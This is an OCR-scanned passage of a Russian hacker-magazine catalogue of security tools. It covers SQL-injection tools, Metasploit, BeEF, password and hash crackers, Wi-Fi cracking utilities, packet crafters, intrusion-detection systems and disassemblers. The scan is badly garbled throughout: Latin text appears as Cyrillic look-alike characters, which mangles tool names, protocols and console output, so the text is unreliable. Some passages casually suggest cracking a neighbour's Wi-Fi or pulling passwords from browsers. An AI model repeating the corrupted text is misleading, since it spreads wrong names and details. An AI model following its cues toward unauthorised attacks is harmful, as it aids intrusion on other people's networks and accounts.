Мз501 по еггог 
МзЗдЬ ВІіпсІ 
МзЗДЬ Ііппе ЬазесІ 
МзАссезз 
М-зА-сее^з ВІіпсІ 



034 

ндѵи 

із-дсІ/ЭсІЫпЫ 

Можно сказать, мечта скрипткидиса. Если зціплар может отпугнуть 
своим консольным интерфейсом, то Наѵу — своего рода воплоще- 
ние идеи «ЗОЬинъекция — это просто». Тулза имеет удобный СШ, 
с которым разберется даже ребенок. При этом, как и зцітар, Наѵу 
поддерживает множество баз данных, включая МуЗОЦ М3 50І_, 
Огасіе, РозІдгеЗОЦ М3 Ассезз, ЗуЬазе и разные типы инъекций. 
Кроме бесплатной версии, есть более платный вариант с рядом до- 
полнительных опций (например, обходом тосІ_5есигИ:у). 




щ? Рап^оИп - Атаггпі 50І_ ІщесГѵап ѴУогІй 



ур, І_ ЬГф : //'Л'ѵѵѵѵ . доодІеІаЬе . сот/Раррз =5еап±і -ПаЬзйд = % 

Туре Іпіедег т ОБ Ассезз 



ІпЬгтаІюп 



Со ЗеІесІаІІ Ііпзеіесі: аіі 

Мате ІпГогтаГоп 

□ ОаІаЬазе РаГЬ 

□ РооГ РаГН 
. □ Ргіѵегз 

П Ргіѵегз апоНпег т. . . 
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РАЫсоиы 

із.дсІ/РУкехѵ 

Еще один инструмент для эксплуатации ЗОЬинъекций, разрабо- 
танный специально для ленивых хакеров. Достаточно указать ІІНІ_ с 
уязвимым параметром, и программа автоматически определит тип 
ЗОЬинъекции, базу данных и выдаст другую полезную инфу. При- 
ятный СІІІ позволит без особых усилий сдампить БД с уязвимого 
ресурса, получить хеши паролей, выполнить свой ЗОЬзапрос, про- 
читать произвольные данные с удаленной ситемы и так далее. По- 
мимо популярных БД, Рапдоііп поддерживает ОВ2, ІпТогтіх, ЗуЬазе. 



Педізізег 

А 
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ЭКСПЛУАТАЦИЯ 

УЯЗВИМОСТЕЙ 

Уязвимость, пусть даже критическая, без воз- 
можности эксплуатации ничего не дает. В этом 
разделе собраны программы, которые могут 
быть полезны не только для поиска, но и для экс- 
плуатации уязвимостей. 



036 



МЕТА8РЮІТ 

із.дсІ/А5(ЮРІІ 

Если ты никогда не слышал о Меіазріоіі:, значит, этот жур- 
нал попал к тебе по ошибке или ты открыл его в первый 
раз. Меіазріоіі; — это один из столпов среди инструментов 
хакера, изначально разрабатываемый известным зесигііу- 
специалистом НЮ Мооге. Инструмент уже давно и дале- 
ко ушел от своей изначальной идеи — простого сборника 
эксплойтов. На текущий момент помимо эксплойтов в нем 
огромное количество различных вспомогательных инстру- 
ментов (сканеры, брутфорсеры, энкодеры) на любой случай 
жизни — сегодня это уже почти все в одном. Стоит сказать, 
что разработчики и комьюнити очень быстро добавляют хо- 
рошие эксплойты (это, как правило 1-сІау), однако иногда 
можно встретить и О-бау, утекший в Сеть. Также благодаря 
огромному сообществу существуют различные дополнения 
для Меіазріоіі:, которые еще расширяют его функционал (на- 
пример, З.Е.Т.). Весь код написан на РиЬу и изначально по- 
строен из расчета удобной расширяемости. 



Рііе Ѵіем Ехріоііе Аихіііагу Рауіоабэ Нізііогу Роз^-Ех 
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= [ тпеііазріоіт ѵ4.7.0-с!еѵ [соте: 4. 7 арі : 1 . 0] 
--=[ 1083 ехріоііз - 608 аихіііагу - 177 роз! 
--=[ 298 рауіоабз - 29 епсобегз - 8 гюрз 
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О Ю83 ехріоіі 60Е 



[21:50:49] -=[ ВеЕР ѵ0.4.2.6-а1рЬа ]=- 

[21:50:49] Епзиге уои'ге гиппіпд ІЬе Іаіе: 

[21:50:49] 1 пеіиюгк іпІегГасез иіеге сіеіеі 

[21:50:49] РезеШпд ІЬе сІаІаЬаве Рог ВеЕІ 

[21:50:50] ВеЕР І5 Іоасііпд. Иаіі а Геи 5& 

[21:50:50] б ехіепзіопз Іоасіесі: 

[21:50:50] I еѵепів Іоддег 

[21:50:50] I айтіпізігаііоп ыеЬ Ш 

[21:50:50] I сіетопз 1га Ііопз 

[21:50:50] I іпіііаіігаііоп 

[21:50:50] I ргоху 

[21:50:50] І_ сопзоіе 

[21:50:50] 33 тосіиіез Іоасіей. 

[21 : 50:50] [+] гиппіпд оп пеішогк іпіегіасе: 
[21:50:50] I Ноок ІІРІ_: Ыір: //127.0,8, 1 

[21:50:50] I 81 №1.: ЬПр: //127.0, Ѳ. 1 

[21:50:50] І_ йето ІЖІ_: Ыір: //127.0.Ѳ. 1 

[21 :50:50][+] НИР Ргоху: Ыір: // 127.Ѳ.Ѳ, 1 :6 
[21:55:08] Ноокес) Ьгоиізег 127. Ѳ. 0,1 Ьаз Ь 

[21:55:18] Ноокес) Ьгоиізег 127.0.0,1 Ьаз е: 

[21:55:28] Ноокес) Ьгоиізег 127.0.0,1 Ьаз Ь 

Г21 : 55 : 39] Ноокес) Ьгоиізег 127.0.8.1 Ьаз < 
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ВЕЕР 

із.дсІ/у9І_кех 

Эксплуатационный фреймворк, 
нацеленный на уязвимости в 
браузерах. Позволяет управлять 
зоопарком зомби-машин из удоб- 
ного графического интерфейса, 
выполняя множество полезных 
функций, реализованных в качестве 
модулей. ВеЕР имеет простую мо- 
дульную структуру и давно уже на- 
учился взаимодействовать в связке 
с Меіазріоіі: через ХМ І_РІРС. Проект 
активно разрабатывается, и в него 
постоянно добавляются новые спо- 
собы и методы эксплуатации. 




РІООІ.ЕП 

Із.дб/і0и8бр 

Специальная прокси, перехва- 
тывающая весь НТТР(5) трафик 
и предоставляющая удобные 
средства для манипулирования 
им. Например, можно установить 
своего рода брейкпоинты или опи- 
сать триггеры с помощью системы 
событий и скриптовой подсистемы. 
Теперь все кукисы, заголовки, 
параметры запросов будут как на 
ладони, и ими спокойно можно 
манипулировать. Тут уж просто грех 
не проверить, насколько хорошо 
реализована валидация параме- 
тров с серверной стороны. 
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ОѴѴА8Р РРОХѴ 

із.дсѴІМККГОО 

Библиотека, написанная на баѵа, 
которая может быть использова- 
на для реализации непарсящих 
прокси. Чтобы было понятней, 
представь себе проблему: ты 
просто так через Вигр не сможешь 
сделать атаки на НРС и прочие 
фаззинги параметров — ибо таким 
образом ты будешь тестировать 
не парсер серверной стороны, а 
парсер Вигр'а. Как раз в таких ситу- 
ациях, когда нужен прокси и в то же 
время ты делаешь Тиггіпд и НРС, — 
ОѴѴАЗР Ргоху и поможет. 
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8ЕТ 

із.дсІ/сІІаТкН 

Даже в самой защищенной системе 
есть уязвимость, и эта уязвимость 
— человек, Кевин Митник доказал 
данное утверждение на все 200%. 
ЗЕТ — это набор социального 
инженера, созданный для про- 
ведения атак против человеческого 
элемента. Он моментально вошел в 
арсенал стандартных инструментов 
всех пентестеров. ЗЕТ был написан 
Дэвидом Кеннеди при активном 
участии сообщества и включает 
в себя атаки, никогда прежде не 
входившие в другие инструменты 
для проникновения. 
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ѴЕП8ІЫІА 

із.дсІ/д7НАС)2 

Программа для пентеста распреде- 
ленных систем на низком уровне. 

В настоящее время реализованы 
атаки на следующие протоколы: 
Зраппіпд Тгее Ргоіосоі (5ТР), Сізсо 
Оізсоѵегу Ргоіосоі (СОР), Оупапліс 
Тгипкіпд Ргоіосоі (йТР), Оупаппіс 
Нозі: СопТідигаІіоп Ргоіосоі (ОНСР), 
Ноі ЗІапсІЬу Воиіег Ргоіосоі (Н8РР), 
802. 1 д, 802. 1х, Іпіег-Зѵѵіісіі І_іпк 
Ргоіосоі (ІЗІ_), ѴЬАЫ Тгипкіпд 
Ргоіосоі (ѴТР). Правда, пока без 
поддержки ІРѵб. 
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2АР 

Із.дс1/ѵ5іпс7 

Ореп зоигсе программа для прове- 
дения пентестов веб-приложений, 
чтобы сделать их более безопас- 
ными. В некоторых случаях 2АР 
даже может автоматически найти 
некоторые уязвимости, но в первую 
очередь он разрабатывался для 
помощи исследователям в ручном 
поиске. По сути это перехватываю- 
щий прокси, позволяющий просма- 
тривать весь проходящий трафик и 
ставить брейкпоинты. Кроме этого, 
в состав входят активный и пассив- 
ный сканеры уязвимостей. 






-043- 

РІПЕРОХ + АОООЫ8 

із.дсі/АВР\Л/72 

При пентесте веб-приложений 
не обойтись без современного 
веб-браузера с набором по- 
лезных расширений. Для РігеТох 
существует огромное количество 
аддонов (Таплрег Оаіа — пожалуй, 
самый известный), которые могут 
быть полезны при тестах на про- 
никновение. Подмена ІІзег-АдепІ:, 
манипуляция с НТТР-данными, 
удобная работа с прокси-сервера- 
ми, мощная дебаг-консоль — все 
это мы разбирали в нашей статье 
«Рігеіюх-убийца» в Хакер №7/10. 




ООМІЫАТОВ 

із.дсІ/4ѴС4Е6 

Среди утилит для поиска уязви- 
мостей в веб-приложениях крайне 
редко попадаются те, которые 
умеют детектировать йОМ Х83. 
Поэтому нельзя не упомянуть такой 
инструмент, как Оопліпаіог. Утилита 
реализована в виде надстройки для 
Рігейэх и существенно упрощает 
поиск подобных багов. Кстати, у 
Оопліпаіог есть более продвину- 
тая, но платная версия. К счастью, 
разработчик предлагает бесплат- 
ный ІгіаІ-период, которым вполне 
можно воспользоваться. 



БРУТФОРС 

Прямой перебор значений какого-то параметра 
(например, пароля) был актуален во все времена. 
Медлительность способа всегда пытались ком- 
пенсировать с помощью правильных алгоритмов, 
а впоследствии радужных таблиц и вычислений 
на видеоадаптере. 







'ІОНІІТНЕШРРЕП 

із.дсІ/ТсІІОШ 

ѵЪІіп Ше Віррег — старейший (с 1996 года) и по-прежнему 
активно развиваемый Ореп Зоигсе инструмент для аудита 
баз хешей паролей, а также для восстановления забытых 
паролей, ѵіоііп работает на II N IX- подобных системах (вклю- 
чая ОЗ X), на ѴѴіпсІоѵѵз и на ряде других систем, и обычно 
управляется с командной строки. В так называемых іиплЬо- 
версиях, развиваемых международным сообществом раз- 
работчиков, суммарно поддерживается более 200 типов 
хешей, методов аутентификации, шифрованных секретных 
ключей, архивов, «офисных» файлов, файловых систем, баз 
данных менеджеров паролей, кошельков Віісоіп и др. (наи- 
большее их количество — в ветке ЫеесІіпд-іиплЬо на СііНиЬ). 
Есть поддержка многопроцессорных систем через ОрепМР 
и/или опцию --Тогк и поддержка кластеров через МРІ или 
опцию --посіе. Сравнительно недавно появилась поддержка 
СРІІ через ОрепСЬ и США. Что примечательно, утилита ис- 
ходно родом из России и написана Александром Песляком. 



-» піп ./}оНп — іе5і 

ВепсНтагкіпд: ТгагіШопаІ ЭЕБ [128/128 В5 55Е2-16]... (4хОМР) ГОЖ 
Мапу здИз: 3866К с/5 геаі, 1342К с/5 ѵігіиаі 

Опіу опе 5оИ: 3768К с/5 геаі, 1277К с/5 ѵігЬиа! 

ВепсНтагкіпд: В5ЭІ ЭЕ5 (х725) [128/128 В5 55Е2-16]... (4хОМР) ГОЖ 
Мапу 5а1і5: 153093 с/5 геаі, 49718 с/5 ѵігіиаі 

Опіу опе 5а1і: 133120 с/5 геаі, 46383 с/5 ѵігіиаі 

ВепсНшагкіпд: РгееВБЭ М05 [128/128 55Е2 іггЬгіп5ІС5 12x3... (4хОМР; 
Каѵѵ: 32256 с/5 геаі, 11161 с/5 ѵі г±иа! 

ВепсНшагкіпд: ОрепВБО В1оѵѵРІ5Іі (х32) [32/64 Х2]... (4хОМР) ГОЧЕ 
Каѵѵ: 1330 с/5 геаі, 468 с/5 ѵігШаІ 

ВепсНтагкіпд: КегЬего5 АР5 0Е5 [48/64 4К]... ООЫЕ 
БЬогі: 356864 с/5 геаі, 321499 с/5 ѵігіиаі 

1_опд: 1120К с/5 геаі, 1120К с/5 ѵігТиа! 

ВепсЬтагкіпд: Ш РЕ5 [128/128 В5 55Е2-16]... (4хОМР) ГОЫЕ 
Каѵѵ: 25559К с/5 геаі, 8843К с/5 ѵіг*иа1 

Вепсіттагкіпд: гіупатіс_0: тсІ5($р) (гаѵѵ-пхі5) [128/128 55Е2 іпігіп5І< 
Каѵѵ: 19208К с/5 геаі, 16998К с/5 ѵігіиаі 
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1 . 0 РНТСРАСК 

із.дсІ/1 сІРхІЗ 

Программа для аудита и восстанов- 
ления паролей винды. Позволяет 
восстанавливать пароли пользова- 
телей атакой по словарю, гибридом 
атаки по словарю и последователь- 
ного перебора, атакой последо- 
вательным перебором. Работает 
на всехѴѴіпсІоѵѵз (начиная сХР), а 
также большинстве *піх-систем. 

С помощью сторонних программ 
можно экспортировать для взлома 
пароли с удаленных машин. Име- 
ется встроенный планировщик, по- 
зволяющий проводить аудит через 
заданные промежутки времени. 



ОСІ.НА 8 НСАТ 

із.дсІ/ТаМоТХ 

СРІІ переборщик паролей. Показы- 
вает самые лучшие результаты для 
перебора методом грубой силы. 
Лучшая утилита для таргетирован- 
ного перебора одного хеша (пере- 
бор по чартсетам). Ыіе-версия 
работает быстрее на 30-40%, но 
поддерживает значительно меньше 
типов хешей, чем ріиз. Программа 
рассчитана на работу с дискретны- 
ми видеокартами как от АІѴЮ, так и 
от ІЧѴЮІА и поддерживает следую- 
щие алгоритмы: ІѴЮ5, ЗНА1 , Му50І_ 
>ѵ4.1, ІѴЮ4, ІЧТІ_М, Оотаіп СасІіесІ 
Сгесіепііаіз, ЗНА256. 



ТНСНѴОВА 

Із.дсІ/ГтЦѴВР 

Легендарный многопоточный брут- 
форсер для различных сервисов от 
хак-группы ТНС. Многие считают 
его одним из лучших. Почему? Да 
хотя бы потому, что поддерживает 
подбор паролей для столь огром- 
ного списка сервисов: ТЕІ_ІЧЕТ, 

РТР, НТТР, НТТРЗ, НТТР-РНОХХ 
ЗМВ, 5МВІЧТ, МЗ-ЗОЦ МѴЗОЦ 
ВЕХЕС,В5Н, РЮОСІІЧ, СѴ5, ЗІЧМР, 
ЗМТР-АІІТН, 50СК35, ѴЫС, РОРЗ, 
ІМАР, ІЧІЧТР, РСІЧР8, ІСО, ЗАР/РЗ, 
ЦЭАР2, ШАРЗ, Розідгез, Театзреак, 
Сізсо аиіИ, Сізсо епаЫе, АРР, ШАР2, 
Сізсо ААА. 



НА 8 НКІЫ. 

із.дсІ/д21ІртМ 

Свободная многопоточная про- 
грамма для восстановления 
паролей. Для достижения высокой 
скорости перебора задействует 
наборы инструкций ЗЗЕ2/АѴХ/ХОР/ 
АЕЗ-ІЧІ. Поддерживает 50 плагинов 
для взлома различных типов па- 
ролей (от простых МР5 и 8НА1 до 
ѴѴРА, запароленных РАР-архивов). 
Поддерживает сохранение/вос- 
становление рабочей сессии, таким 
образом, если программа упадет, 
не надо будет начинать перебор с 
начала. Позволяет брутить пароли 
с помощью СРІІ. 
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САІЫ АЫОАВЕЬ 

із.дсІ/хОСМОМ 

Тебе нужно извлечь пароли и 
личные данные, сохраненные в 
браузере? Не проблема. Клик 
по нужной иконке — и они твои. 
Интересуешься пассами, которые 
непрерывно передаются по твоей 
локалке? В этом случае восполь- 
зуйся встроенным сниффером. 

С помощью 15 встроенных утилит 
Саіп & АЬеІ может взломать разные 
типы хешей, провести исследова- 
ние беспроводной сети, а также вы- 
полнить еще целый ряд уникальных 
действий, нацеленных на подбор 
или расшивку паролей. 



- 049 - 

ПАІЫВОѴѴСПАСК 

із.дсІ/ОЕіѵѵМт 

Что отличает ее от обычных брут- 
форсов? Обычные взломщики гене- 
рируют все возможные варианты 
текста, вычисляют от каждого хеш 
и сравнивают с искомым значе- 
нием. ВаіпЬоѵѵСгаск действует по- 
другому: она проверяет искомый 
хеш, сравнивая со значениями из 
предварительно предкалькулиро- 
ванной таблицы. Таким образом, 
благодаря методу радужных таблиц 
время на вычисление хешей 
экономится, а тратится только на 
сравнение, что позволяет довольно 
быстро получить результат. 



- 051 - 

МЕОІІ 8 А 

із.дй/ОІзШ 

Быстрый параллельный модуль- 
ный брутфорсер сетевых серви- 
сов. Поддерживает кучу сервисов: 
АРР, СѴ5, РТР, НТТР, ІМАР, М5-50Ц 
МуЗОЦ ІМСР (ІЧеМ/аге), ІМЫТР, 
РсАпуѵѵНеге, РОРЗ, РозІдгеЗОЦ 
гехес, гіодіп, гзИ, ЗМВ, ЗМТР 
(АІІТН/ѴВРѴ), ЗЫМР, 55Нѵ2, ЗѴЫ, 
Теіпеі, ѴплАЩІісІ, ѴІЧС. Обладает 
гибкой системой задания входных 
параметров. А каждый модуль для 
брутфорса представляет собой 
отдельный файл, что позволяет 
безболезненно наращивать функ- 
ционал. 



-053 - 

МШ.ТІРОВСЕП 

із.дсі/пІ2М20 

Задействует всю мощь графиче- 
ских процессоров ІМѴЮІА, чтобы 
превратить хеш в пароль. Что 
касается хешей, то поддерживает- 
ся МБ4, Мй5, ІМТІ.М, ЗНА1 , М3 301_ 
и их вариации типа ЗНА1 ОРМР5 
— зНаІ (тсВДразз)), ТВІРІ.ЕМ05 — 
тб5(тб5(тсІ5($разз))). Есть еще 
новая версия программы — ІЧеѵѵ 
МиШТогсег, в ней уже добавлена 
работа с карточками АМР. Чтобы 
запустить брут, надо указать про- 
грамме файл с набором допусти- 
мых символов, файл со взламывае- 
мым хешем и тип хеша. 
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ЭКСПЕРИМЕНТЫ 

СѴѴІ-РІ 

Побаловаться вардрайвингом, проверить безо- 
пасность беспроводной сети соседа, обнаружить 
скрытые сети вокруг — просто как дважды два, 
когда есть хороший ѴѴі-Рі-адаптер, добротная 
антенна и пара полезных утилит. 




АШСПАСК 

із.дсѴйРзиЫ 

Аігсгаск представляет собой набор инструментов для ау- 
дита беспроводных сетей (взлома ѴѴі-Рі ѴѴЕР и брутфорса 
ѴѴРА-Р8К ключей). Очень популярный инструмент, кото- 
рый состоит из множества дополнительных программ, на- 
пример аігеріау-пд для иъекции пакетов или аігобиплр-пд 
для дампа беспроводного трафика. Программа работает 
с любыми беспроводными сетевыми адаптерами, драй- 
вер которых поддерживает режим мониторинга (список 
можно найти на сайте программы). Существуют порты 
для ѴѴіпбоѵѵз, І_іпих и ОЗ X, но версия для II N IX- подобных 
операционных систем имеет значительно большую функ- 
циональность и поддерживает больше беспроводных 
адаптеров, чем ѴѴіпсІоѵѵз-версия (важным условием работы 
является возможность инъектировать пакеты). Аігсгаск-пд 
был также портирован для мобильных платформ 2аишз 
и Маепло. Также программа была портирована для іРЬопе. 
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КІ 8 МЕТ 

Із.дс1/д4р8еи 

Эта утилита мониторинга и сбора 
пакетов с беспроводных интерфей- 
сов, которая всегда была важной 
частью арсенала любого вардрай- 
вера. Кізтеі; имеет консольный 
СІІІ на ІіЬпсигсез. Запускается где 
угодно, например, без проблем 
работала на КПК іРац, не говоря 
уже о современных устройствах. 
Удобно, что сразу показывает 
количество ІѴ/ЬапсІзІіакез для ѴѴЕР/ 
ѴѴРА. Работает вкупе с другими ути- 
литами типа сіеиаііуіпіесіюгз. Очень 
удобная для вардрайвинга — имеет 
интеграцию с геолокацией СРЗЭ. 
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ВЕАѴЕВ 

із.дсІ/6НОо7І_ 

Незаменимый инструмент для 
взлома ѴѴі-Рі АР-точек с включен- 
ным ѴѴРЗ. Позволяет подобрать 
РІІЧ-коддля восстановления ѴѴРА/ 
ѴѴРА2 паролей за несколько часов. 
Взлом осуществляется путем брут- 
форса 8-значного цифрового РІІМ’а, 
половины которого вычисляются 
независимо друг от друга. 
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КІ 8 МАС 

із.дсІ/АѵѵРЮсІ 



Еще одна утилита для обнаружения 
и проверки беспроводных сетей, 
но разработанная специально для 
Мае. Обнаруживает скрытые 55Ю, 
показывает информацию о подклю- 
ченных клиентах (МАС-адрес, ІР- 
адрес и силу сигнала), имеет под- 
держку СР5, поддержку стандарта 
802.11 Ь/д, умеет проверять сети на 
стойкость к различного вида атакам 
(брутфорс атаки против І_ЕАР, ѴѴРА 
и ѴѴЕР, некоторые типы атак про- 
тив ѴѴЕР), а также совместима с 
АррІеЗсгірІ:. 



Ш 53 ЮЕР 

із.дсІ/НіМсІЬУ 

Подобно устаревшему ЫеІзШтЫег 
утилита использует активные ме- 
тоды сканирования беспроводных 
сетей, а всю найденную о точках 
доступа информацию отображает 
в табличке, сдабривая данные 
красивыми графиками уровня 
сигнала. По сути, лучший стамблер 
для ѴѴіпсІоѵѵз. 




^ 059 - 

СЕЯІХОТІРІСЯАСКЕЯ 

Ссылка на сайт 

Утилиты для вардрайвинга консоль- 
ные, поэтому постоянно приходит- 
ся ковыряться с передаваемыми 
ключами для запуска, копировать 
туда-сюда нужные МАС-адреса, 
названия дампов. И если раньше 
приходилось делать все вручную, 
то сейчас процесс можно без труда 
автоматизировать. 








СОѴЕВЗТОПѴ 
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РАБОТА 
С ПАКЕТАМ И 

Когда необходимо работать на уровне пакетов, 
менять значения определенных полей и смо- 
треть, как ведет себя система, эти утилиты ока- 
зываются незаменимыми. 




8САРѴ 

1з.дс1/1_к]12И 

МизІ-Ііаѵе для интерактивной манипуляции пакетами. При- 
нять и декодировать пакеты самых различных протоколов, 
ответить на запрос, инжектировать модифицированный и 
собственноручно созданный пакет — все легко! С помощью 
Зсару можно выполнять целый ряд классических задач вро- 
де сканирования портов, Ігасегоиіе, определения инфра- 
структуры сети. В одном флаконе мы получаем замену таких 
популярных утилит, как Гіріпд, птар, агрзрооТ агр-зк, агріпд, 
Ісрсіитр, ІеШегаІ, рОТ и др. В то же самое время Зсару по- 
зволяет выполнить любое, даже самое специфическое за- 
дание, которое никогда не сможет сделать уже созданное 
другим разработчиком средство. Вместо того чтобы писать 
целую гору строк на Си, чтобы, например, сгенерировать 
неправильный пакет и сделать фаззинг какого-то демона, 
достаточно накидать пару строчек кода с использованием 
Зсару! У программы нет графического интерфейса, а инте- 
рактивность достигается за счет интерпретатора РуІІіоп. 
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N ЕТС АТ 

із.дсІ/6плІ_Р\л/С) 

Простая и надежная утилита для 
работы с сокетами, позволяющая 
читать и писать данные в ТСР и ІЮР 
соединениях, сканировать порты, 
разрешать ОЫЗ-запросы, посылать 
любые команды со стандартного 
ввода, выполнять заранее предо- 
пределенные действия в ответ 
на соединение — своеобразный 
швейцарский нож любого пентесте- 
ра. Из особенностей — будь вни- 
мателен в консольном режиме, так 
как байт ОхОсІ обрезает все данные, 
которые пришли в этой же строке 
до него. Лучше направлять вывод в 
файл и смотреть через Нехсіитр. 



[1] 24795 

% іеіпеі 127.0.0.1 2001 
Ггуіпд 127.0.0.1... 
Сотесіегі Ю ІосаІЬозІ. 
Езсаре сіюгоскег із 
ЮЮІ 10464 


"15 -1 ♦" 


ЙГЖХГ-ХГ-Х 


7 ккоѵосз 


зкаЕТ 


234 Моу 


ІРѴЮІГ-ХР-Х 


6 ккоѵосз 


510^7 


204 Моу : 


гігѵосг-хг-х 


62 ккоѵосз 


ЗЮЕГ 


2104 Арг 


Йптср-хг-х 


3 ккоѵосз 


ЗІО^ 


102 Аид : 


-гжхг-хг-х 


1 ккоѵосз 




747 Оес ; 


йпѴХГ-ХГ-Х 


4 ккоѵосз 


Ыа" 


136 Оес ; 


ЙРШХР-ХГ-Х 


5 ккоѵосз 


ЫаН 


170 Іиі ; 


ЙПУХР-ХГ-Х 


17 ккоѵосз 


5ІаН 


574 Арг 


-ПЯ-Р--Г— 


1 ккоѵосз 


зЮЕГ 5556757 Оес ; 


ЙПЮСР-ХР-Х 

СотесЬіо" 


4 ккоѵосз зІаГТ 
сіозегі Ьу Гогеідп Гюзі 


136 ГеЪ ; 



-062- 

80САТ 

із.дсІ/А4ѴѴдхХ 

По большому счету это расширен- 
ная версия Меісаі, но работающая с 
большим количеством протоколов, 
файлов, пайпов, девайсов (терми- 
налов или модемов), сокетов (ІРѵ4, 
ІРѵб, ІЮР, ТСР), соксов, проксей 
и даже ЗЗІ_. Функциональность 
такого инструмента впечатляет. 

Ее одинаково успешно можно 
использовать как соксофикатор, 
инструмент для перенаправления 
портов безопасный туннеллер или 
сниффер. Приятно, что работает 
она не только под никсами, но и под 
виндой. 




ЮКІ 

із.дсІ/ІНХКШ 



Фреймворк на РуІІіоп, работающий 
под всеми операционными систе- 
мами и включающий множество 
модулей для генерации пакетов и 
атак на протоколы сетевого уровня, 
в том числе ВОР, ЮР, ОЗРР, ѴРРР 
и другие. Утилита завоевала боль- 
шую популярность после представ- 
ления на хакерских конференциях. 




064 

ЫЕМЕ8І8 

із.дсІ/ЗрѵЭХг 



Меплезіз — это консольная утилита 
для пакетной инжекции, работа- 
ющая как под виндой, так и под 
никсовыми осями. С ее помощью 
можно сначала создать, а потом 
передать нужные тебе сетевые 
пакеты прямо из командной строки. 
Отличный инструмент для тестиро- 
вания ЮЗ, файрвола и ІР-стека. 
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НРШС 

із.дсІ/ЗІІІсиІ 

Нріпд — утилита для І_іпих, 

РгееВЗР, ЫеШЗй, ОрепВЗО, Зоіагіз 
для анализа, составления и работы 
с ТСР/ІР-пакетами. Поддерживает 
ТСР, ІЮР, ІСМР и ВАѴѴ-ІР, может 
работать какігасегоиіе. Говорят, что 
чрезвычайно полезна для изучаю- 
щих ТСР/ІР. Не проверяли :). 
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Защита компьютерных сетей, как обычных, так и 
беспроводных, — тема острая и злободневная. 
Чтобы обезопасить себя от неприятных сюрпри- 
зов, следует реализовать защиту в комплексе. 
Особое место в этом списке занимают системы 
обнаружения атак (Ю5). 




5ЫОПТ 

із.дсІ/гуіРіс 

Зпогі является сетевой системой обнаружения атак (ЮЗ) с 
открытым исходным кодом, которая способна выполнить 
в реальном времени анализ ІР-пакетов, передаваемых на 
контролируемых интерфейсах. Зпогі: обнаруживает атаки, 
комбинируя два метода: сигнатурный и анализ протоко- 
лов. Система, построенная на Зпогі:, способна собирать 
и обрабатывать информацию с нескольких разнесенных 
датчиков. Все вдело в производительности компьютеров, 
используемых в качестве сенсоров. Система состоит из 
модулей, каждый из которых направлен только на одно: 
выявлять всевозможные черви, эксплойты, сканирование 
портов, разные виды атак, а также другие подозритель- 
ные действия. Все это настраивается с помощью специ- 
ального языка правил, которые четко регламентируют 
действия защитной системы. 
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-да- 

8СІІИ 

із.дсІ/2КсІИ0х 

Зпогі создан для того, чтобы выпол- 
нять одну задачу — определение 
атак, и выполняет он ее хорошо. 
Анализ файлов журналов отдан на 
откуп сторонним разработчикам. 
Вообще, системы обнаружения 
вторжений (ЮЗ) обычно редко 
обладают красивым и наглядным 
интерфейсом, а также мощной 
системой оповещения. За них 
эту работу выполняют отдельные 
приложения, и одним из наиболее 
мощных из них является ЗдиіІ. Она 
обрабатывает логи ЮЗ и превра- 
щает их в удобный для анализа 
сІазИЬоагсІ. 



Ф<ж 

Маіп ЗвагсН ІпівдгКу еНвскіпд 



Аиуиѵі 290. 2009 12;'І6;08 РМ 

АѵаіІаЫе адепіз: 

«ига» апгѵиг (і ѵ/лілш) 
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088ЕСНЮ8 

із.дсі/08ѴХНІ 

Добротная ЮЗ со стандартным 
набором функций, которые 
реализованы на самом высоком 
уровне. Мы говорим об эффектив- 
ном анализаторе логов, проверке 
целостности системных файлов, 
выявлении распространенных 
руткитов, а также своевременном 
оповещении админа. Впрочем, 
чаще всего 088ЕС НЮ5 все-таки 
используется именно в качестве 
анализатора логов файрволов, 
веб-демонов, систем авторизации 
и других ЮЗ. 




— 0695 - 

088ІМ 

із.дсі/ІЛіОтѴА 

Целая система, построенная на 
ореп зоигсе решениях. Виртуальная 
машина с І_іпих будет выполнять 
роль основной системы контроля. 
Различные агенты, которые можно 
разместить в ключевых узлах сети 
(Зпогі, Ыадіоз, кастомные анализа- 
торы логов, системы контроля це- 
лостности и сканер уязвимостей), 
будут централизованно отстукивать 
и докладывать о ситуации. Система 
же будет реагировать на события 
согласно настройкам. Чтобы ее 
развернуть, нужно вложить душу, 
но результат того стоит. 




4070 :- 

НОЫЕѴО 

із.дсІ/КѵгІхВ 

НопеусІ — специализированная 
платформа для построения хони- 
потов (ловушек для хакера). Она 
работает по модульному принци- 
пу. Каждый сервис — отдельный 
скрипт, определяющий поведение 
ловушки и реализующий меха- 
низм «запрос — ответ». Кроме 
того, Нопеуй имеет расширенные 
средства формирования виртуаль- 
ных сетей, в которых роль узлов 
выполняют сконфигурирован- 
ные ловушки. Так что сложность 
хонипота зависит только от твоей 
фантазии. 
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РЕВЕРСИНГ 

Обратный инжиниринг — это тоже своего рода 
высокое искусство. И как даже гениальному ху- 
дожнику не нарисовать очередного шедевра без 
хорошей кисти, так и реверсеру не разобраться 
с дебрями машинного кода без подходящих ин- 
струментов. Мы собрали самые востребованные. 







ІОАРПО 

із.дсѴН21І\л/7г 

Наиболее известный коммерческий инструмент для обрат- 
ного анализа, разработанный компанией Нех-Рауз. Когда- 
то, в далеких 90-х, все начиналось с дизассемблера с воз- 
можностью интерактивного редактирования и поддержкой 
сложных типов данных в виде структур. Сейчас это уже 
куда более продвинутый инструмент. Программа имеет 
возможность расширения и развитый ЗйК для разработ- 
ки различных плагинов, начиная с добавления поддержки 
новых процессорных архитектур и до автоматизации про- 
цесса отладки при помощи встроенного АРІ для скрипто- 
вых языков (ЮС, ЮАРуШоп). Про поддержку РуШоп стоит 
отдельно отметить, так как он уже довольно давно тесно 
интегрирован при помощи плагина ЮАРуШоп, и на дан- 
ный момент поддерживает практически все возможности 
нативного ЗйК на С++, за исключением лишь совсем спе- 
цифичных вещей. 








«і 072 И 

НІЕѴѴ 

із.дсІ/Зг64ІО 

Нех-редактор и дизассемблер в од- 
ном флаконе. Конечно, Ніеѵѵ не пре- 
тендует на лавры ЮА Рго, но порой 
бывает очень полезен. А поддержка 
встроенного ассемблирования 
позволяет легко модифицировать 
код непосредственно в исполняе- 
мом файле. Есть также поддержка 
скриптов на диалекте ассемблера, 
который позволяет, например, 
быстро разработать процедуру 
расшифрования для зашифрован- 
ных данных внутри исполняемого 
файла. В общем, инструмент для 
случаев, когда функционал ЮА Рго 
оказывается избыточен. 




01 0 БОНОВ 

із.дсі/ггга/ѵн 



010 Ебііюг в последнее время стал 
популярен среди людей, занимаю- 
щихся обратным анализом. Основ- 
ной изюминкой этого инструмента 
является удобный интерфейс для 
анализа различных структуриро- 
ванных данных. Ты можетшьопи- 
сать в виде С -структуры представ- 
ление блока данных или формата 
файла и после этого получить удоб- 
ную навигацию по данным. Имеется 
